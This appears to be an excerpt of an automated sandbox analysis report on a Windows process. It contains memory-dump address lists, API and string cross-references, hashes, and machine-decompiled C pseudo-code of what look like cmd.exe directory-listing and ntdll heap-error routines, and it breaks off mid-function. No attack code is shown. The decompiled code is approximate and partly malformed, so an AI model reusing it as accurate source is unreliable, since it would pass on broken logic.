0x00343a49
0x00000000
0x003439d2
0x003439c1
0x003439c1
0x00000000
0x003439c1
0x00343954
0x00343961
0x003439fa
0x00343a01
0x00000000
0x00000000
0x0034df5f
0x0034df66
0x00000000
0x0034df6c
0x0034df6c
0x0034df73
0x00000000
0x00000000
0x0034df79
0x0034df7b
0x00000000
0x00000000
0x0034df81
0x0034df83
0x00000000
0x00000000
0x0034df87
0x0034df8e
0x0034df8f
0x0034df92
0x00000000
0x00000000
0x00000000
0x0034df92
0x00000000
0x0034df66
0x00000000
0x00343961
0x00343932
0x003438ce
0x003438ce
0x003438d5
0x0034deb9
0x0034deb9
0x003438f8
0x00000000
0x003438f8
0x0034de73
0x0034389a
0x0034389c
0x0034389f
0x003438a6
0x0034de78
0x0034de78
0x00000000
0x003438a6

APIs

InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,0035BDF8,00000108,0033C897,?,00000000,00000000,00000000), ref: 003437A0
UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 003437CF
memset.MSVCRT ref: 003437E7
memset.MSVCRT ref: 00343840
GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 00343853

Part of subcall function 00343320: _wcsnicmp.MSVCRT ref: 003433A4

lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 003438AE
CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 003438F8
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 0034391A
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0034DDE6
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0034DE02
DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 0034DE1B
CreateProcessAsUserW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 0034DEAE
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 0034DFCB

Strings

COPYCMD, xrefs: 00343865, 00343926
%01C, xrefs: 0034DFA1
=ExitCode, xrefs: 003439B2
\XCOPY.EXE, xrefs: 003438A8
=ExitCodeAscii, xrefs: 003439C6
D, xrefs: 00343848
%08X, xrefs: 0034399C
H, xrefs: 003437FB
, xrefs: 00343783

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: AttributeProcThread$CloseCreateErrorHandleLastListProcessmemset$DeleteInfoInitializeStartupUpdateUser_wcsnicmplstrcmp
String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
API String ID: 1603632292-3461277227
Opcode ID: 488830f3a9a2975b8c190d86268f222bb41fc9618dbcbe8415fee7eba60a821e
Instruction ID: 7ec78cc5a6fb7a878db3e5ddc9f2d3005644c3f7ffe31ffc1567f004ab35daea
Opcode Fuzzy Hash: 488830f3a9a2975b8c190d86268f222bb41fc9618dbcbe8415fee7eba60a821e
Instruction Fuzzy Hash: B0C19F71A003199EDB37DB649C45BAA77FCAB45700F0140AAF94AEF290DB70AA84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0344B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0344B3D6
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0344B47D
read from, xrefs: 0344B4AD, 0344B4B2
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0344B2F3
The instruction at %p referenced memory at %p., xrefs: 0344B432
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0344B2DC
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0344B305
an invalid address, %p, xrefs: 0344B4CF
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0344B314
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0344B39B
The resource is owned exclusively by thread %p, xrefs: 0344B374
*** An Access Violation occurred in %ws:%s, xrefs: 0344B48F
a NULL pointer, xrefs: 0344B4E0
This failed because of error %Ix., xrefs: 0344B446
The instruction at %p tried to %s , xrefs: 0344B4B6
*** Inpage error in %ws:%s, xrefs: 0344B418
*** then kb to get the faulting stack, xrefs: 0344B51C
<unknown>, xrefs: 0344B27E, 0344B2D1, 0344B350, 0344B399, 0344B417, 0344B48E
The critical section is owned by thread %p., xrefs: 0344B3B9
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0344B476
Go determine why that thread has not released the critical section., xrefs: 0344B3C5
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0344B484
The resource is owned shared by %d threads, xrefs: 0344B37E
*** enter .cxr %p for the context, xrefs: 0344B50D
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0344B38F
*** enter .exr %p for the exception record, xrefs: 0344B4F1
*** Resource timeout (%p) in %ws:%s, xrefs: 0344B352
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0344B323
write to, xrefs: 0344B4A6
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0344B53F

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: d809db67b80cc161a71a5f7ab761a44249b44c1baf776c17b6ded30c621cadd2
Instruction ID: 2124260d666d5fa3f4e6ca5870fdd867d8de7305b4b7a5388d9e38bdf0633cc0
Opcode Fuzzy Hash: d809db67b80cc161a71a5f7ab761a44249b44c1baf776c17b6ded30c621cadd2
Instruction Fuzzy Hash: CF811239A40310FFEB21EB06AC85E7F7B25EF86A51F4440AAF0146F256D661C402D6BA

Uniqueness

Uniqueness Score: -1.00%

Function 00346550, Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 535
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E00346550(void* _a4, signed int _a8, void* _a12, signed int* _a16, void* _a20, signed int* _a24, char _a28, long _a32, char _a36, long _a40, short _a42, int _a44, void _a48, int _a564, int _a568, signed int _a572, int _a576, char _a612, void _a648, intOrPtr _a1152, char _a1156, int _a1168, signed int _a1172, char* _a1176, char _a1184, intOrPtr _a1208, void _a1212, signed int _a1220, signed short _a1222, signed int _a1224, signed int _a1226, signed int _a17612) {
				struct _SECURITY_DESCRIPTOR* _v0;
				void* _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t187;
				signed int _t190;
				signed int _t191;
				void* _t192;
				signed int _t195;
				signed int _t201;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				intOrPtr _t216;
				intOrPtr _t217;
				signed int _t219;
				signed int _t221;
				signed int _t223;
				signed int* _t228;
				signed int _t237;
				signed int _t240;
				WCHAR* _t241;
				void* _t242;
				signed int _t243;
				void* _t245;
				signed int _t256;
				void* _t257;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				WCHAR* _t281;
				signed int _t282;
				signed int _t285;
				signed int _t286;
				signed int _t306;
				struct _SECURITY_DESCRIPTOR* _t310;
				signed int _t311;
				void* _t312;
				signed int _t313;
				char* _t314;
				struct _SECURITY_DESCRIPTOR* _t315;
				void* _t316;
				intOrPtr _t317;
				intOrPtr* _t331;
				void* _t337;
				void* _t345;
				void* _t364;
				void* _t371;
				void* _t373;
				intOrPtr _t374;
				intOrPtr _t381;
				char* _t383;
				intOrPtr _t388;
				intOrPtr _t389;
				signed int* _t394;
				void* _t395;
				int _t396;
				void* _t399;
				void* _t400;
				signed int _t401;
				signed int _t402;

				_t402 = _t401 & 0xfffffff8;
				E00348290(0x44d4);
				_t187 =  *0x35d0b4; // 0xd59bd0e8
				_a17612 = _t187 ^ _t402;
				_t371 = _a4;
				_t310 = _a8;
				_t399 = _a12;
				_t394 = _a16;
				_t316 =  &(_t310->Owner);
				_a4 = _t316;
				_t317 =  *((intOrPtr*)(_t316 + 0x1c));
				 *((intOrPtr*)(_t371 + 0x28)) =  *((intOrPtr*)(_t371 + 0x28)) +  *((intOrPtr*)(_t316 + 0x20));
				_a12 = _t371;
				asm("adc [edx+0x2c], ecx");
				_t190 =  *_t394;
				_t372 = _t190;
				_v0 = _t310;
				_a24 = _t394;
				if((_t190 & 0x00000010) != 0) {
					__eflags = _t190;
					if(_t190 < 0) {
						goto L1;
					}
					 *_t394 = _t190 & 0xffffffef;
					_t195 = E003465F0(_t394, _a12, _t399, _t394);
					_t372 =  *_t394 | 0x00000010;
					 *_t394 = _t372;
					__eflags = _t195;
					if(_t195 != 0) {
						L5:
						_pop(_t395);
						_pop(_t400);
						_pop(_t312);
						return E00346FD0(_t195, _t312, _a17612 ^ _t402, _t372, _t395, _t400);
					}
					_t372 = _t372 | 0x80000000;
					 *_t394 = _t372;
				}
				L1:
				if((_t372 & 0x00000040) == 0) {
					__eflags = _t372 & 0x00000004;
					if((_t372 & 0x00000004) == 0) {
						__eflags = _t372 & 0x00000402;
						if(__eflags == 0) {
							_t191 =  *(_t310 + 2) & 0x0000ffff;
							__eflags = _t191;
							if(_t191 == 0) {
								_t192 = 0x2c;
							} else {
								_t192 = 0x2c + _t191 * 2;
							}
							_t311 = E0035A49A(_t399, _t372, _t192 +  &(_t310->Owner), _t317);
							__eflags = _t311;
							if(_t311 == 0) {
								_t373 = 0xe;
								E00357A11(_t399, _t373);
								_t372 = _t394[0x17];
								_t311 = E0035A3E9(_t399, _t394[0x17],  *_t394, _a4);
							}
							__eflags =  *(_t399 + 8);
							if( *(_t399 + 8) == 0) {
								L4:
								_t195 = _t311;
								goto L5;
							}
							_t195 = E0033B610(_t311, _t399, _t394);
							__eflags = _t195;
							if(_t195 != 0) {
								goto L5;
							}
							goto L4;
						}
						_t325 = _t399;
						_t372 = _t394[0x17];
						_t311 = E0035A2C1(_t310, _t399, _t394[0x17], __eflags, _t394[0x17], _a4);
						_t200 = 0;
						_a24 = 0;
						__eflags = _t311;
						if(_t311 != 0) {
							L70:
							__eflags =  *(_t399 + 8) - _t200;
							if( *(_t399 + 8) == _t200) {
								L72:
								__eflags =  *_t394 & 0x00100000;
								if(( *_t394 & 0x00100000) == 0) {
									goto L4;
								}
								_t201 = E00347797(_t325);
								__eflags = _t201;
								if(_t201 == 0) {
									goto L4;
								}
								_a1172 = 1;
								_a1176 = 0x104;
								_a1168 = 0;
								memset( &_a648, 0, 0x104);
								_t402 = _t402 + 0xc;
								__eflags = _a1172;
								_t210 = E00340C70( &_a648, ((0 | _a1172 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
								__eflags = _t210;
								if(_t210 < 0) {
									L91:
									__imp__??_V@YAXPAX@Z(_a1168);
									goto L4;
								}
								_t329 = _a1168;
								__eflags = _a1168;
								if(_a1168 == 0) {
									_t329 =  &_a648;
								}
								_t372 = _a1176;
								_t214 = E003451C9(_t329, _a1176,  *((intOrPtr*)(_a12 + 4)), _a4 + 0x2c);
								__eflags = _t214;
								if(_t214 == 0) {
									_t215 = _a1168;
									__eflags = _t215;
									if(_t215 == 0) {
										_t215 =  &_a648;
									}
									_t372 = 0;
									_t216 =  *0x37c00c(_t215, 0,  &_a48, 0);
									_v16 = _t216;
									__eflags = _t216 - 0xffffffff;
									if(_t216 != 0xffffffff) {
										do {
											_t331 =  &_a40;
											_t372 = _t331 + 2;
											do {
												_t217 =  *_t331;
												_t331 = _t331 + 2;
												__eflags = _t217 - _a16;
											} while (_t217 != _a16);
											__eflags = _t331 - _t372 >> 1 - 2;
											if(__eflags < 0) {
												L85:
												_t372 =  *_t394;
												_t219 = E00359FD6(_t399,  *_t394, __eflags, _v12,  &_a32);
												_t311 = _t219;
												__eflags = _t311;
												if(_t311 != 0) {
													goto L89;
												}
												__eflags =  *(_t399 + 8) - _t219;
												if( *(_t399 + 8) == _t219) {
													goto L89;
												}
												_t223 = E0033B610(_t311, _t399, _t394);
												_a8 = _t223;
												__eflags = _t223;
												if(_t223 == 0) {
													goto L89;
												}
												__imp__??_V@YAXPAX@Z(_a1152);
												_t195 = _a8;
												goto L5;
											}
											__eflags = _a42 - 0x3a;
											if(__eflags == 0) {
												goto L89;
											}
											goto L85;
											L89:
											_t221 =  *0x37c038(_v16,  &_a32);
											__eflags = _t221;
										} while (_t221 != 0);
										FindClose(_v24);
									}
								}
								goto L91;
							}
							_t325 = _t399;
							_t195 = E0033B610(_t311, _t399, _t394);
							__eflags = _t195;
							if(_t195 != 0) {
								goto L5;
							}
							goto L72;
						}
						__eflags =  *_t394 & 0x00000400;
						if(( *_t394 & 0x00000400) == 0) {
							_t374 =  *0x35d190; // 0x13
							_t375 = _t374 + 0x13;
							__eflags = _t374 + 0x13;
						} else {
							_t315 = _v0;
							__eflags =  *(_t315 + 2);
							if( *(_t315 + 2) != 0) {
								_t389 =  *0x35d190; // 0x13
								_t364 = _t399;
								E00357A11(_t364, _t389 + 0x13);
								_push(_t364);
								E00346740(_t399,  *_t394, _t315 + 0x30 + ( *(_t315 + 2) & 0x0000ffff) * 2);
							}
							_t388 =  *0x35d190; // 0x13
							_t375 = _t388 + 0x20;
						}
						_t337 = _t399;
						E00357A11(_t337, _t375);
						_t372 =  *_t394;
						_t313 = L"...";
						_a8 = _t313;
						__eflags = _t372 & 0x00040000;
						if((_t372 & 0x00040000) == 0) {
							L42:
							_push(_t337);
							_t325 = _t399;
							_a16 = _a4 + 0x2c;
							_t311 = E00346740(_t399, _t372, _a4 + 0x2c);
							_t228 = _v4;
							__eflags =  *_t228 & 0x00000400;
							if(( *_t228 & 0x00000400) == 0) {
								L69:
								_t200 = 0;
								__eflags = 0;
								goto L70;
							}
							__eflags = _t228[9] & 0x20000000;
							if((_t228[9] & 0x20000000) == 0) {
								goto L69;
							}
							_a568 = 1;
							_a572 = 0x104;
							_a564 = 0;
							memset( &_a44, 0, 0x104);
							_t402 = _t402 + 0xc;
							__eflags = _a568;
							_t237 = E00340C70( &_a44, ((0 | _a568 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
							__eflags = _t237;
							if(_t237 < 0) {
								L67:
								_t372 = L"%s";
								E00346B76(_t399, L"%s", L" [.]");
								L68:
								__imp__??_V@YAXPAX@Z(_a564);
								_pop(_t325);
								goto L69;
							}
							_t341 = _a564;
							__eflags = _a564;
							if(_a564 == 0) {
								_t341 =  &_a44;
							}
							_t240 = E003451C9(_t341, _a572,  *((intOrPtr*)(_a8 + 4)), _a12);
							__eflags = _t240;
							if(_t240 != 0) {
								goto L67;
							} else {
								_t241 = _a564;
								__eflags = _t241;
								if(_t241 == 0) {
									_t241 =  &_a44;
								}
								_t242 = CreateFileW(_t241, 8, 7, 0, 3, 0x2200000, 0);
								_a12 = _t242;
								__eflags = _t242 - 0xffffffff;
								if(_t242 != 0xffffffff) {
									_t243 = DeviceIoControl(_t242, 0x900a8, 0, 0,  &_a1212, 0x4002,  &_a32, 0);
									_t372 = L"%s";
									_t345 = _t399;
									__eflags = _t243;
									if(_t243 != 0) {
										E00346B76(_t345, L"%s", L" [");
										__eflags = _a1208 - 0xa0000003;
										if(_a1208 != 0xa0000003) {
											__eflags = _a1212 - 0xa000000c;
											if(_a1212 != 0xa000000c) {
												_t396 = 6;
												L63:
												_t133 = _t396 + 2; // 0x8
												_t245 = E003400B0(_t133);
												_v4 = _t245;
												__eflags = _t245;
												if(_t245 != 0) {
													memcpy(_t245, _a4, _t396);
													_t402 = _t402 + 0xc;
													__eflags = 0;
													 *((short*)(_v4 + (_t396 >> 1) * 2)) = 0;
													E00346B76(_t399, L"%s", _v4);
													E00340040(_v8);
												}
												_t372 = L"%s";
												E00346B76(_t399, L"%s", "]");
												_t394 = _a16;
												goto L66;
											}
											_t396 = _a1226 & 0x0000ffff;
											_a4 = _t402 + 0x4e4 + ((_a1224 & 0x0000ffff) >> 1) * 2;
											__eflags = _t396;
											if(_t396 != 0) {
												goto L63;
											}
											_t256 = (_a1220 & 0x0000ffff) >> 1;
											__eflags = _t256;
											_t257 = _t402 + 0x4e4 + _t256 * 2;
											L61:
											_t396 = _a1222 & 0x0000ffff;
											_a4 = _t257;
											goto L63;
										}
										_t396 = _a1226 & 0x0000ffff;
										_a4 = _t402 + 0x4e0 + ((_a1224 & 0x0000ffff) >> 1) * 2;
										__eflags = _t396;
										if(_t396 != 0) {
											goto L63;
										}
										_t257 = _t402 + 0x4e0 + ((_a1220 & 0x0000ffff) >> 1) * 2;
										goto L61;
									}
									_push(L" [...]");
									goto L54;
								} else {
									_push(L" [..]");
									_t372 = L"%s";
									_t345 = _t399;
									L54:
									E00346B76(_t345, _t372);
									L66:
									CloseHandle(_a12);
									goto L68;
								}
							}
						} else {
							_a16 = 0x101;
							_a20 = 0;
							_a568 = 0;
							_a28 = 0x10;
							_a572 = 1;
							_a576 = 0x104;
							memset( &_a48, 0, 0x104);
							_t402 = _t402 + 0xc;
							__eflags = _a572;
							_t272 = E00340C70( &_a48, ((0 | _a572 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
							__eflags = _t272;
							if(_t272 >= 0) {
								_t273 = E003400B0(0x10000);
								_v0 = _t273;
								__eflags = _t273;
								if(_t273 != 0) {
									_t354 = _a568;
									__eflags = _a568;
									if(_a568 == 0) {
										_t354 =  &_a48;
									}
									_t277 = E003451C9(_t354, _a576,  *((intOrPtr*)(_a12 + 4)), _a4 + 0x2c);
									__eflags = _t277;
									if(_t277 != 0) {
										L33:
										E00346B76(_t399, L"%s", _t313);
										goto L36;
									} else {
										_t281 = _a568;
										__eflags = _t281;
										if(_t281 == 0) {
											_t281 =  &_a48;
										}
										_t282 = GetFileSecurityW(_t281, 1, _v0, 0x10000,  &_a40);
										__eflags = _t282;
										if(_t282 == 0) {
											goto L33;
										} else {
											_t285 = GetSecurityDescriptorOwner(_v0,  &_a20,  &_a44);
											__eflags = _t285;
											if(_t285 == 0) {
												goto L33;
											}
											_t286 = E00347797( &_a40);
											__eflags = _t286;
											if(_t286 == 0) {
												L34:
												_push(_t313);
												_t383 = L"%s";
												L35:
												E00346B76(_t399, _t383);
												__eflags = 0;
												_a16 = 0;
												L36:
												E00340040(_v0);
												L37:
												__eflags =  *_t394 & 0x00000400;
												_t381 =  *0x35d190; // 0x13
												if(( *_t394 & 0x00000400) == 0) {
													_t382 = _t381 + 0x2a;
													__eflags = _t381 + 0x2a;
												} else {
													_t382 = _t381 + 0x37;
												}
												E00357A11(_t399, _t382);
												L41:
												__imp__??_V@YAXPAX@Z(_a568);
												_t372 =  *_t394;
												_pop(_t337);
												goto L42;
											}
											 *0x37c034(0, _a20,  &_a648,  &_a16,  &_a1184,  &_a28,  &_a36);
											__eflags = 0;
											if(0 == 0) {
												goto L34;
											}
											_t314 = L"%s";
											E00346B76(_t399, _t314,  &_a1156);
											E00346B76(_t399, _t314, "\\");
											_t383 = _t314;
											_push( &_a612);
											goto L35;
										}
									}
								}
								E00346B76(_t399, L"%s", _t313);
								goto L37;
							}
							E00346B76(_t399, L"%s", _t313);
							goto L41;
						}
					}
					_t306 = E0035AB79(_t399, _t372, _a4);
					L3:
					_t311 = _t306;
					goto L4;
				}
				_t306 = E0034660F(_t399, _t372,  *((intOrPtr*)(_a12 + 4)), _a4);
				goto L3;
			}

0x00346555
0x0034655d
0x00346562
0x00346569
0x00346570
0x00346574
0x00346578
0x0034657c
0x0034657f
0x00346585
0x00346589
0x0034658c
0x0034658f
0x00346593
0x00346596
0x00346598
0x0034659a
0x0034659e
0x003465a4
0x0034f9ae
0x0034f9b0
0x00000000
0x00000000
0x0034f9bf
0x0034f9c1
0x0034f9c8
0x0034f9cb
0x0034f9cd
0x0034f9cf
0x003465ca
0x003465d1
0x003465d2
0x003465d3
0x003465de
0x003465de
0x0034f9d5
0x0034f9db
0x0034f9db
0x003465aa
0x003465ad
0x0034f9e2
0x0034f9e5
0x0034f9f8
0x0034f9fe
0x00350030
0x00350034
0x00350037
0x00350044
0x00350039
0x00350039
0x00350039
0x00350053
0x00350055
0x00350057
0x0035005b
0x0035005e
0x00350067
0x00350073
0x00350073
0x00350075
0x00350079
0x003465c8
0x003465c8
0x00000000
0x003465c8
0x00350081
0x00350086
0x00350088
0x00000000
0x00000000
0x00000000
0x0035008e
0x0034fa08
0x0034fa0b
0x0034fa13
0x0034fa15
0x0034fa17
0x0034fa1b
0x0034fa1d
0x0034feac
0x0034feac
0x0034feaf
0x0034fec0
0x0034fec0
0x0034fec6
0x00000000
0x00000000
0x0034fecc
0x0034fed1
0x0034fed3
0x00000000
0x00000000
0x0034fede
0x0034fee8
0x0034fef1
0x0034ff00
0x0034ff0e
0x0034ff11
0x0034ff27
0x0034ff2c
0x0034ff2e
0x0035001d
0x00350024
0x00000000
0x0035002a
0x0034ff34
0x0034ff3b
0x0034ff3d
0x0034ff3f
0x0034ff3f
0x0034ff4a
0x0034ff5c
0x0034ff61
0x0034ff63
0x0034ff69
0x0034ff70
0x0034ff72
0x0034ff74
0x0034ff74
0x0034ff7b
0x0034ff85
0x0034ff8b
0x0034ff8f
0x0034ff92
0x0034ff98
0x0034ff98
0x0034ff9c
0x0034ff9f
0x0034ff9f
0x0034ffa2
0x0034ffa5
0x0034ffa5
0x0034ffb0
0x0034ffb3
0x0034ffbd
0x0034ffbd
0x0034ffca
0x0034ffcf
0x0034ffd1
0x0034ffd3
0x00000000
0x00000000
0x0034ffd5
0x0034ffd8
0x00000000
0x00000000
0x0034ffdc
0x0034ffe1
0x0034ffe5
0x0034ffe7
0x00000000
0x00000000
0x0034fff0
0x0034fff6
0x00000000
0x0034fffa
0x0034ffb5
0x0034ffbb
0x00000000
0x00000000
0x00000000
0x00350000
0x00350009
0x0035000f
0x0035000f
0x00350017
0x00350017
0x0034ff92
0x00000000
0x0034ff63
0x0034feb1
0x0034feb3
0x0034feb8
0x0034feba
0x00000000
0x00000000
0x00000000
0x0034feba
0x0034fa23
0x0034fa29
0x0034fa65
0x0034fa6b
0x0034fa6b
0x0034fa2b
0x0034fa2b
0x0034fa2f
0x0034fa33
0x0034fa35
0x0034fa3b
0x0034fa40
0x0034fa4b
0x0034fa55
0x0034fa55
0x0034fa5a
0x0034fa60
0x0034fa60
0x0034fa6e
0x0034fa70
0x0034fa75
0x0034fa77
0x0034fa7c
0x0034fa80
0x0034fa86
0x0034fc60
0x0034fc67
0x0034fc69
0x0034fc6b
0x0034fc74
0x0034fc76
0x0034fc7a
0x0034fc80
0x0034feaa
0x0034feaa
0x0034feaa
0x00000000
0x0034feaa
0x0034fc86
0x0034fc8d
0x00000000
0x00000000
0x0034fc98
0x0034fca2
0x0034fcab
0x0034fcb7
0x0034fcc2
0x0034fcc5
0x0034fcdb
0x0034fce0
0x0034fce2
0x0034fe8b
0x0034fe90
0x0034fe97
0x0034fe9c
0x0034fea3
0x0034fea9
0x00000000
0x0034fea9
0x0034fce8
0x0034fcef
0x0034fcf1
0x0034fcf3
0x0034fcf3
0x0034fd09
0x0034fd0e
0x0034fd10
0x00000000
0x0034fd16
0x0034fd16
0x0034fd1d
0x0034fd1f
0x0034fd21
0x0034fd21
0x0034fd35
0x0034fd3b
0x0034fd3f
0x0034fd42
0x0034fd6f
0x0034fd75
0x0034fd7a
0x0034fd7c
0x0034fd7e
0x0034fd94
0x0034fd99
0x0034fda4
0x0034fdda
0x0034fde5
0x0034fe29
0x0034fe2a
0x0034fe2a
0x0034fe2d
0x0034fe32
0x0034fe36
0x0034fe38
0x0034fe40
0x0034fe49
0x0034fe4e
0x0034fe56
0x0034fe5c
0x0034fe65
0x0034fe65
0x0034fe6f
0x0034fe76
0x0034fe7b
0x00000000
0x0034fe7b
0x0034fdef
0x0034fe00
0x0034fe04
0x0034fe06
0x00000000
0x00000000
0x0034fe10
0x0034fe10
0x0034fe12
0x0034fe19
0x0034fe19
0x0034fe21
0x00000000
0x0034fe21
0x0034fdae
0x0034fdbf
0x0034fdc3
0x0034fdc5
0x00000000
0x00000000
0x0034fdd1
0x00000000
0x0034fdd1
0x0034fd80
0x00000000
0x0034fd44
0x0034fd44
0x0034fd49
0x0034fd4e
0x0034fd85
0x0034fd85
0x0034fe7f
0x0034fe83
0x00000000
0x0034fe83
0x0034fd42
0x0034fa8c
0x0034fa8e
0x0034fa9b
0x0034faa1
0x0034faad
0x0034fab5
0x0034fabd
0x0034fac4
0x0034facf
0x0034fad2
0x0034fae8
0x0034faed
0x0034faef
0x0034fb08
0x0034fb0d
0x0034fb11
0x0034fb13
0x0034fb27
0x0034fb2e
0x0034fb30
0x0034fb32
0x0034fb32
0x0034fb4c
0x0034fb51
0x0034fb53
0x0034fc08
0x0034fc10
0x00000000
0x0034fb59
0x0034fb59
0x0034fb60
0x0034fb62
0x0034fb64
0x0034fb64
0x0034fb79
0x0034fb7f
0x0034fb81
0x00000000
0x0034fb87
0x0034fb95
0x0034fb9b
0x0034fb9d
0x00000000
0x00000000
0x0034fb9f
0x0034fba4
0x0034fba6
0x0034fc17
0x0034fc17
0x0034fc18
0x0034fc1d
0x0034fc1f
0x0034fc24
0x0034fc26
0x0034fc2a
0x0034fc2e
0x0034fc33
0x0034fc33
0x0034fc39
0x0034fc3f
0x0034fc46
0x0034fc46
0x0034fc41
0x0034fc41
0x0034fc41
0x0034fc4b
0x0034fc50
0x0034fc57
0x0034fc5d
0x0034fc5f
0x00000000
0x0034fc5f
0x0034fbce
0x0034fbd4
0x0034fbd6
0x00000000
0x00000000
0x0034fbdf
0x0034fbe9
0x0034fbf7
0x0034fc03
0x0034fc05
0x00000000
0x0034fc05
0x0034fb81
0x0034fb53
0x0034fb1d
0x00000000
0x0034fb1d
0x0034faf9
0x00000000
0x0034faf9
0x0034fa86
0x0034f9ee
0x003465c6
0x003465c6
0x00000000
0x003465c6
0x003465c1
0x00000000

Strings

..., xrefs: 0034FA77, 0034FAF1, 0034FB15, 0034FC08, 0034FC17
[.], xrefs: 0034FE8B
:, xrefs: 0034FFB5
[..], xrefs: 0034FD44
[...], xrefs: 0034FD80

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: [...]$ [..]$ [.]$...$:
API String ID: 0-1980097535
Opcode ID: d0656130f86fc75c1acaa878882c04165618ca2bcac0f41a02673679fe67b51e
Instruction ID: bbb73aba2e690b65dbf5dd9485c21330b9b3420d695237e6ce9cb3db4175c01b
Opcode Fuzzy Hash: d0656130f86fc75c1acaa878882c04165618ca2bcac0f41a02673679fe67b51e
Instruction Fuzzy Hash: FA128E702083419FD726DF24C885A6FB7E9EF89305F14492DF989CB2A1EB30E945CB56

Uniqueness

Uniqueness Score: -1.00%

Function 03451C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E03451C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x33748a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0339B150();
				} else {
					E0339B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x348589c);
				E0339B150("Heap error detected at %p (heap handle %p)\n",  *0x34858a0);
				_t27 =  *0x3485898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M03451E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
